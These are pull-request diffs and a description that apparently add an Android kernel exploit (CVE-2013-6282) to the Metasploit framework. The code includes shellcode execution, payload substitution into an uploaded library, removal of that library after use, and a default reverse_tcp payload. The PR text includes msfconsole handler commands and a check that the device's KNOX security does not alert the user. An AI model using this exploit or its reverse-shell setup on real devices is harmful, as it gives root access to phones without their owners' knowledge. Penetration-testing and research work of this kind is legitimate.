+			return;
 		}
 		memcpy(ptr, shellcode_buf, sizeof(shellcode_buf));
 		void (*shellcode)() = (void(*)())ptr;

--- a/external/source/exploits/CVE-2013-6282/exploit.c
+++ b/external/source/exploits/CVE-2013-6282/exploit.c
@@ -679,18 +679,13 @@ void init_exploit() {
 	}
 	LOGV("running shellcode, uid=%d\n", uid);
 
-	int pid = fork();
-	LOGV("onload, pid=%d\n", pid);
-	if (pid == 0) {
-		void *ptr = mmap(0, sizeof(shellcode_buf), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
-		if (ptr == MAP_FAILED) {
-			return;
-		}
-		memcpy(ptr, shellcode_buf, sizeof(shellcode_buf));
-		void (*shellcode)() = (void(*)())ptr;
-		shellcode();
+	void *ptr = mmap(0, sizeof(shellcode_buf), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+	if (ptr == MAP_FAILED) {
+		return;
 	}
-	LOGV("finished, pid=%d\n", pid);
+	memcpy(ptr, shellcode_buf, sizeof(shellcode_buf));
+	void (*shellcode)() = (void(*)())ptr;
+	shellcode();
 
 	LOGV("exiting.\n");
 }
@@ -712,7 +707,10 @@ JNIEXPORT jint JNICALL JNI_OnLoad( JavaVM *vm, void *pvt )
 		return -1;
 	}
 
-	init_exploit();
+	int pid = fork();
+	if (pid == 0) {
+		init_exploit();
+	}
 	return JNI_VERSION_1_4;
 }
 

--- a/lib/msf/core/post_mixin.rb
+++ b/lib/msf/core/post_mixin.rb
@@ -29,8 +29,8 @@ module Msf::PostMixin
   #
   # @raise [OptionValidateError] if {#session} returns nil
   def setup
-    unless session_compatible?(session)
-      raise Msf::OptionValidateError.new(["SESSION (type not valid for this module)"])
+    if not session
+      raise Msf::OptionValidateError.new(["SESSION"])
     end
 
     super

--- a/lib/msf/core/post_mixin.rb
+++ b/lib/msf/core/post_mixin.rb
@@ -29,8 +29,8 @@ module Msf::PostMixin
   #
   # @raise [OptionValidateError] if {#session} returns nil
   def setup
-    if not session
-      raise Msf::OptionValidateError.new(["SESSION"])
+    unless session_compatible?(session)
+      raise Msf::OptionValidateError.new(["SESSION (type not valid for this module)"])
     end
 
     super

--- a/modules/exploits/android/local/put_user_vroot.rb
+++ b/modules/exploits/android/local/put_user_vroot.rb
@@ -44,15 +44,12 @@ class MetasploitModule < Msf::Exploit::Local
         "Arch"           => ARCH_ARMLE,
         'DefaultOptions' =>
         {
+          'WfsDelay'     => 120,
           'PAYLOAD'      => 'linux/armle/mettle/reverse_tcp',
         },
         'DefaultTarget' => 0,
       }
     ))
-    register_options(
-      [
-        OptInt.new("ListenerTimeout", [ true, "The maximum number of seconds to wait for a session", 300])
-      ], self.class)
   end
 
   def exploit
@@ -70,9 +67,6 @@ class MetasploitModule < Msf::Exploit::Local
     write_file(remote_file, exploit_data)
 
     print_status("Loading exploit library #{remote_file}")
-    old_timeout = session.response_timeout
-    print_status("Be patient, this exploit will automatically timeout after #{datastore['ListenerTimeout']} seconds")
-    session.response_timeout = datastore['ListenerTimeout']
     session.core.load_library(
         'LibraryFilePath' => local_file,
         'TargetFilePath'  => remote_file,
@@ -80,10 +74,9 @@ class MetasploitModule < Msf::Exploit::Local
         'Extension'       => false,
         'SaveToDisk'      => false
     )
-    session.response_timeout = old_timeout
-    print_status("Loaded library #{remote_file}")
+    print_status("Loaded library #{remote_file}, deleting")
     session.fs.file.rm(remote_file)
-    print_status("Library #{remote_file} was deleted")
+    print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
   end
 
 end

--- a/modules/exploits/android/local/put_user_vroot.rb
+++ b/modules/exploits/android/local/put_user_vroot.rb
@@ -1,0 +1,88 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Common
+
+  def initialize(info={})
+    super( update_info( info, {
+        'Name'           => "Android get_user/put_user Exploit",
+        'Description'    => %q{
+            This module exploits a missing checks in the get_user and put_user API functions
+            in the linux kernel before 3.5.5. The missing checks on these functions
+            allow an unpriviledged user to read and write kernel memory.
+                This exploit first reads the kernel memory to identify the commit_creds and
+            ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.
+            The exploit was first discovered in the wild in the vroot rooting application.
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         => [
+          'fi01',        # libget_user_exploit / libput_user_exploit
+          'cubeundcube', # kallsyms_in_memory
+          'timwr',       # Metasploit module
+        ],
+        'References'     =>
+        [
+          [ 'CVE', '2013-6282' ],
+          [ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2434453' ],
+          [ 'URL', 'https://github.com/fi01/libget_user_exploit' ],
+          [ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2565758' ],
+        ],
+        'DisclosureDate' => "Sep 06 2013",
+        'SessionTypes'   => [ 'meterpreter' ],
+        "Platform"       => [ "android", "linux" ],
+        'Targets'        => [[ 'Automatic', { }]],
+        'Payload'        => { 'Space'    => 2048, },
+        "Arch"           => ARCH_ARMLE,
+        'DefaultOptions' =>
+        {
+          'PAYLOAD'      => 'linux/armle/mettle/reverse_tcp',
+        },
+        'DefaultTarget' => 0,
+      }
+    ))
+    register_options(
+      [
+        OptInt.new("ListenerTimeout", [ true, "The maximum number of seconds to wait for a session", 300])
+      ], self.class)
+  end
+
+  def exploit
+    local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2013-6282.so" )
+    exploit_data = File.read(local_file, {:mode => 'rb'})
+
+    space = payload_space
+    payload_encoded = payload.encoded
+
+    # Substitute the exploit shellcode with our own
+    exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))
+
+    workingdir = session.fs.dir.getwd
+    remote_file = "#{workingdir}/lib#{Rex::Text::rand_text_alpha_lower(5)}.so"
+    write_file(remote_file, exploit_data)
+
+    print_status("Loading exploit library #{remote_file}")
+    old_timeout = session.response_timeout
+    print_status("Be patient, this exploit will automatically timeout after #{datastore['ListenerTimeout']} seconds")
+    session.response_timeout = datastore['ListenerTimeout']
+    session.core.load_library(
+        'LibraryFilePath' => local_file,
+        'TargetFilePath'  => remote_file,
+        'UploadLibrary'   => false,
+        'Extension'       => false,
+        'SaveToDisk'      => false
+    )
+    session.response_timeout = old_timeout
+    print_status("Loaded library #{remote_file}")
+  end
+
+end
+

--- a/modules/exploits/android/local/put_user_vroot.rb
+++ b/modules/exploits/android/local/put_user_vroot.rb
@@ -41,7 +41,6 @@ class MetasploitModule < Msf::Exploit::Local
         "Platform"       => [ "android", "linux" ],
         'Targets'        => [[ 'Automatic', { }]],
         'Payload'        => { 'Space'    => 2048, },
-        "Arch"           => ARCH_ARMLE,
         'DefaultOptions' =>
         {
           'WfsDelay'     => 120,

--- a/modules/exploits/android/local/put_user_vroot.rb
+++ b/modules/exploits/android/local/put_user_vroot.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   include Msf::Post::File
   include Msf::Post::Common
+  include Msf::Exploit::FileDropper
 
   def initialize(info={})
     super( update_info( info, {
@@ -66,7 +67,8 @@ class MetasploitModule < Msf::Exploit::Local
     exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))
 
     workingdir = session.fs.dir.getwd
-    remote_file = "#{workingdir}/lib#{Rex::Text::rand_text_alpha_lower(5)}.so"
+    remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
+    register_file_for_cleanup(remote_file)
     write_file(remote_file, exploit_data)
 
     print_status("Loading exploit library #{remote_file}")

--- a/modules/exploits/android/local/put_user_vroot.rb
+++ b/modules/exploits/android/local/put_user_vroot.rb
@@ -11,7 +11,6 @@ class MetasploitModule < Msf::Exploit::Local
 
   include Msf::Post::File
   include Msf::Post::Common
-  include Msf::Exploit::FileDropper
 
   def initialize(info={})
     super( update_info( info, {
@@ -68,7 +67,6 @@ class MetasploitModule < Msf::Exploit::Local
 
     workingdir = session.fs.dir.getwd
     remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
-    register_file_for_cleanup(remote_file)
     write_file(remote_file, exploit_data)
 
     print_status("Loading exploit library #{remote_file}")
@@ -84,6 +82,8 @@ class MetasploitModule < Msf::Exploit::Local
     )
     session.response_timeout = old_timeout
     print_status("Loaded library #{remote_file}")
+    session.fs.file.rm(remote_file)
+    print_status("Library #{remote_file} was deleted")
   end
 
 end

--- a/modules/exploits/android/local/put_user_vroot.rb
+++ b/modules/exploits/android/local/put_user_vroot.rb
@@ -16,9 +16,9 @@ class MetasploitModule < Msf::Exploit::Local
     super( update_info( info, {
         'Name'           => "Android get_user/put_user Exploit",
         'Description'    => %q{
-            This module exploits a missing checks in the get_user and put_user API functions
+            This module exploits a missing check in the get_user and put_user API functions
             in the linux kernel before 3.5.5. The missing checks on these functions
-            allow an unpriviledged user to read and write kernel memory.
+            allow an unprivileged user to read and write kernel memory.
                 This exploit first reads the kernel memory to identify the commit_creds and
             ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.
             The exploit was first discovered in the wild in the vroot rooting application.


### PR DESCRIPTION
This change adds the put_user / get_user exploit to Android.
This is unfinished but I thought I'd pr it up to get some early feedback.
I'd like to get the interactions with the android meterpreter (and mettle) finished before this lands. I've extended core_loadlib to support loading libraries: https://github.com/rapid7/metasploit-payloads/pull/139. I hope we can add core_loadlib support to mettle and invoke the same exploit binary that way as well. 
This exploit takes a while because it reads kernel memory to get the offsets (which means it should work on more devices than just my Galaxy S4. Because the exploit takes a while I think we need some kind of callback to the user to show the progress of the exploit.
For testing you can enable -DDEBUG in the Android.mk and look at `adb logcat`
Tested on:

```
ro.build.fingerprint=samsung/jfltexx/jflte:4.3/JSS15J/I9505XXUEMKF:user/release-keys
ro.build.PDA=I9505XXUEMKF
ro.product.model=GT-I9505
cat /proc/version: Linux version 3.4.0-2082040 (se.infra@R0210-18) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Wed Nov 27 22:04:32 KST 2013
https://samsung-firmware.org/model/GT-I9505/
http://www.sammobile.com/firmwares/database/GT-I9505/
```

If you need help flashing the firmware, let me know.
## Verification
- [x] Land and use: https://github.com/rapid7/metasploit-payloads/pull/139
- [x] Run `make` in external/source/exploits/CVE-2013-6282 (I can submit binaries if needed)
- [x] Get an android meterpreter session: `msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j`
- [x] Run this rc file (with your LHOST):

```
use exploit/android/local/put_user_vroot 
set LHOST LHOST
set LPORT 4446
set SESSION -1
```
- [x] **Verify** mettle is running as root
- [x] **Verify** that KNOX is still running and has not alerted the user.

TODO:
- add support for running from mettle with dlopenbuf
- give user the progress of the exploit with a callback function
- add check functionality
